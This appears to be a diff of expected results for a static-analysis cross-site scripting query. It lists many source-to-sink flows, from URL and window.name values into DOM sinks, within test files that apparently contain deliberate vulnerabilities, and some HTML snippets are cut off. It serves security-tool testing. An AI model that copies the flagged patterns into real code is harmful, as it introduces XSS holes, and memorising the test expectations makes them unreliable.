on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | Cross-site scripting vulnerability due to $@. | string-manipulations.js:4:16:4:37 | documen ... on.href | user-provided value | +| string-manipulations.js:5:16:5:47 | documen ... lueOf() | string-manipulations.js:5:16:5:37 | documen ... on.href | string-manipulations.js:5:16:5:47 | documen ... lueOf() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:5:16:5:37 | documen ... on.href | user-provided value | +| string-manipulations.js:6:16:6:43 | documen ... f.sup() | string-manipulations.js:6:16:6:37 | documen ... on.href | string-manipulations.js:6:16:6:43 | documen ... f.sup() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:6:16:6:37 | documen ... on.href | user-provided value | +| string-manipulations.js:7:16:7:51 | documen ... rCase() | string-manipulations.js:7:16:7:37 | documen ... on.href | string-manipulations.js:7:16:7:51 | documen ... rCase() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:7:16:7:37 | documen ... on.href | user-provided value | +| string-manipulations.js:8:16:8:48 | documen ... mLeft() | string-manipulations.js:8:16:8:37 | documen ... on.href | string-manipulations.js:8:16:8:48 | documen ... mLeft() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:8:16:8:37 | documen ... on.href | user-provided value | +| string-manipulations.js:9:16:9:58 | String. ... n.href) | string-manipulations.js:9:36:9:57 | documen ... on.href | string-manipulations.js:9:16:9:58 | String. ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:9:36:9:57 | documen ... on.href | user-provided value | +| string-manipulations.js:10:16:10:45 | String( ... n.href) | string-manipulations.js:10:23:10:44 | documen ... on.href | string-manipulations.js:10:16:10:45 | String( ... n.href) | Cross-site scripting vulnerability due to $@. 
| string-manipulations.js:10:23:10:44 | documen ... on.href | user-provided value | +| tainted-url-suffix-arguments.js:6:22:6:22 | y | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | tainted-url-suffix-arguments.js:6:22:6:22 | y | Cross-site scripting vulnerability due to $@. | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | user-provided value | +| tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | +| tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | +| tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | +| translate.js:8:27:8:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:8:27:8:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | +| trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | +| trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | +| tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... 
.search | user-provided value | +| tst3.js:5:26:5:31 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:5:26:5:31 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | +| tst.js:4:18:4:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:4:18:4:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:6:18:6:126 | "" | tst.js:6:37:6:58 | documen ... on.href | tst.js:6:18:6:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:6:37:6:58 | documen ... on.href | user-provided value | +| tst.js:9:5:9:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:9:5:9:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:15:18:15:35 | params.get('name') | tst.js:14:25:14:41 | document.location | tst.js:15:18:15:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:14:25:14:41 | document.location | user-provided value | +| tst.js:18:18:18:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:18:18:18:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:22:18:22:23 | target | tst.js:24:5:24:28 | documen ... .search | tst.js:22:18:22:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:24:5:24:28 | documen ... .search | user-provided value | +| tst.js:29:16:29:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:34:16:34:44 | baz(doc ... search) | tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:34:20:34:43 | documen ... .search | user-provided value | +| tst.js:39:16:39:45 | wrap(do ... search) | tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:39:21:39:44 | documen ... .search | user-provided value | +| tst.js:46:16:46:45 | chop(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | +| tst.js:47:16:47:45 | chop(do ... search) | tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:47:21:47:44 | documen ... 
.search | user-provided value | +| tst.js:48:16:48:32 | wrap(chop(bar())) | tst.js:27:10:27:33 | documen ... .search | tst.js:48:16:48:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:53:25:53:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:53:25:53:48 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:54:25:54:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:54:25:54:48 | documen ... .search | user-provided value | +| tst.js:56:16:56:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:60:20:60:20 | x | tst.js:58:3:58:26 | documen ... .search | tst.js:60:20:60:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:58:3:58:26 | documen ... .search | user-provided value | +| tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:63:49:63:72 | documen ... .search | user-provided value | +| tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:67:26:67:49 | documen ... .search | user-provided value | +| tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:68:25:68:48 | documen ... .search | user-provided value | +| tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... 
.search | Cross-site scripting vulnerability due to $@. | tst.js:70:33:70:56 | documen ... .search | user-provided value | +| tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:71:32:71:55 | documen ... .search | user-provided value | +| tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:76:39:76:62 | documen ... .search | user-provided value | +| tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:30:82:53 | documen ... .search | user-provided value | +| tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:88:25:88:48 | documen ... .search | user-provided value | +| tst.js:95:18:95:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:95:18:95:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:120:18:120:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:120:18:120:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:135:49:135:49 | v | tst.js:132:29:132:50 | window. ... .search | tst.js:135:49:135:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:132:29:132:50 | window. ... .search | user-provided value | +| tst.js:139:29:139:46 | xssSourceService() | tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:142:40:142:61 | window. ... 
.search | user-provided value | +| tst.js:164:28:164:33 | target | tst.js:161:18:161:41 | documen ... .search | tst.js:164:28:164:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:161:18:161:41 | documen ... .search | user-provided value | +| tst.js:170:31:170:37 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:170:31:170:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:172:42:172:48 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:172:42:172:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:173:33:173:39 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:173:33:173:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:175:54:175:60 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:175:54:175:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:176:45:176:51 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:176:45:176:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:177:49:177:55 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:177:49:177:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:183:67:183:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:183:67:183:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:184:67:184:73 | tainted | tst.js:181:19:181:42 | documen ... 
.search | tst.js:184:67:184:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:196:28:196:46 | this.state.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:196:28:196:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:197:28:197:46 | this.state.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:197:28:197:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:198:28:198:46 | this.state.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:198:28:198:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:202:32:202:49 | prevState.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:202:32:202:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:209:28:209:46 | this.props.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:209:28:209:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:210:28:210:46 | this.props.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:210:28:210:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:211:28:211:46 | this.props.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:211:28:211:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... 
.search | user-provided value | +| tst.js:215:32:215:49 | prevProps.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:215:32:215:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:235:60:235:82 | this.st ... Tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:235:60:235:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | tst.js:243:7:243:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:243:7:243:17 | window.name | user-provided value | +| tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | tst.js:244:7:244:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:244:7:244:10 | name | user-provided value | +| tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | tst.js:248:11:248:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:248:11:248:21 | window.name | user-provided value | +| tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | tst.js:264:22:264:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:264:22:264:29 | location | user-provided value | +| tst.js:272:59:272:65 | tainted | tst.js:269:19:269:29 | window.name | tst.js:272:59:272:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:269:19:269:29 | window.name | user-provided value | +| tst.js:287:20:287:20 | e | tst.js:285:9:285:16 | location | tst.js:287:20:287:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:285:9:285:16 | location | user-provided value | +| tst.js:295:20:295:20 | e | tst.js:292:10:292:17 | location | tst.js:295:20:295:20 | e | Cross-site scripting vulnerability due to $@. 
| tst.js:292:10:292:17 | location | user-provided value | +| tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | tst.js:300:35:300:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:300:35:300:42 | location | user-provided value | +| tst.js:316:18:316:35 | params.get('name') | tst.js:311:18:311:34 | document.location | tst.js:316:18:316:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:311:18:311:34 | document.location | user-provided value | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | tst.js:325:20:325:36 | document.location | tst.js:327:5:327:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:325:20:325:36 | document.location | user-provided value | +| tst.js:333:12:333:17 | target | tst.js:332:16:332:39 | documen ... .search | tst.js:333:12:333:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:332:16:332:39 | documen ... .search | user-provided value | +| tst.js:340:16:340:21 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:340:16:340:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:344:21:344:26 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:344:21:344:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:347:18:347:23 | target | tst.js:339:19:339:42 | documen ... .search | tst.js:347:18:347:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:339:19:339:42 | documen ... .search | user-provided value | +| tst.js:357:18:357:23 | target | tst.js:355:16:355:39 | documen ... .search | tst.js:357:18:357:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:16:355:39 | documen ... .search | user-provided value | +| tst.js:367:18:367:23 | target | tst.js:364:16:364:39 | documen ... 
.search | tst.js:367:18:367:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:369:18:369:29 | target.taint | tst.js:364:16:364:39 | documen ... .search | tst.js:369:18:369:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:375:18:375:30 | target.taint3 | tst.js:374:19:374:42 | documen ... .search | tst.js:375:18:375:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:374:19:374:42 | documen ... .search | user-provided value | +| tst.js:380:18:380:30 | target.taint5 | tst.js:364:16:364:39 | documen ... .search | tst.js:380:18:380:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:389:18:389:30 | target.taint7 | tst.js:364:16:364:39 | documen ... .search | tst.js:389:18:389:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:392:18:392:30 | target.taint8 | tst.js:364:16:364:39 | documen ... .search | tst.js:392:18:392:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:364:16:364:39 | documen ... .search | user-provided value | +| tst.js:400:18:400:24 | payload | tst.js:399:17:399:36 | window.location.hash | tst.js:400:18:400:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:399:17:399:36 | window.location.hash | user-provided value | +| tst.js:404:20:404:27 | match[1] | tst.js:402:15:402:34 | window.location.hash | tst.js:404:20:404:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:402:15:402:34 | window.location.hash | user-provided value | +| tst.js:407:18:407:51 | window. ... '#')[1] | tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:51 | window. ... 
'#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:407:18:407:37 | window.location.hash | user-provided value | +| tst.js:413:18:413:89 | target. ... data>') | tst.js:411:16:411:39 | documen ... .search | tst.js:413:18:413:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:411:16:411:39 | documen ... .search | user-provided value | +| tst.js:423:28:423:33 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:423:28:423:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:424:33:424:38 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:424:33:424:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:425:34:425:39 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:425:34:425:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:426:41:426:46 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:426:41:426:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:427:44:427:49 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:427:44:427:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:428:32:428:37 | source | tst.js:419:15:419:38 | documen ... .search | tst.js:428:32:428:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:38 | documen ... .search | user-provided value | +| tst.js:438:18:438:23 | source | tst.js:436:16:436:39 | documen ... .search | tst.js:438:18:438:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... 
.search | user-provided value | +| tst.js:439:18:439:42 | ansiToH ... source) | tst.js:436:16:436:39 | documen ... .search | tst.js:439:18:439:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:436:16:436:39 | documen ... .search | user-provided value | +| tst.js:446:21:446:26 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:446:21:446:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:448:19:448:24 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:448:19:448:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:450:20:450:25 | source | tst.js:443:15:443:38 | documen ... .search | tst.js:450:20:450:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:443:15:443:38 | documen ... .search | user-provided value | +| tst.js:456:19:456:21 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:456:19:456:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:457:26:457:28 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:457:26:457:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:458:25:458:27 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:458:25:458:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:459:20:459:22 | url | tst.js:454:13:454:36 | documen ... .search | tst.js:459:20:459:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:469:22:469:24 | url | tst.js:454:13:454:36 | documen ... 
.search | tst.js:469:22:469:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:454:13:454:36 | documen ... .search | user-provided value | +| tst.js:474:23:474:45 | locatio ... bstr(1) | tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:474:23:474:35 | location.hash | user-provided value | +| tst.js:477:18:477:40 | locatio ... bstr(1) | tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:477:18:477:30 | location.hash | user-provided value | +| tst.js:484:33:484:63 | decodeU ... n.hash) | tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:484:43:484:62 | window.location.hash | user-provided value | +| tst.js:492:18:492:54 | target. ... "), '') | tst.js:491:16:491:39 | documen ... .search | tst.js:492:18:492:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:491:16:491:39 | documen ... .search | user-provided value | +| typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:9:4:9:34 | "
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:9:4:9:34 | "
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:10:4:10:27 | `
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:10:4:10:27 | `
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:11:4:11:44 | "
    ") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:11:4:11:44 | "
    ") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | +| various-concat-obfuscations.js:12:4:12:41 | ["
    " | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... 
ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| 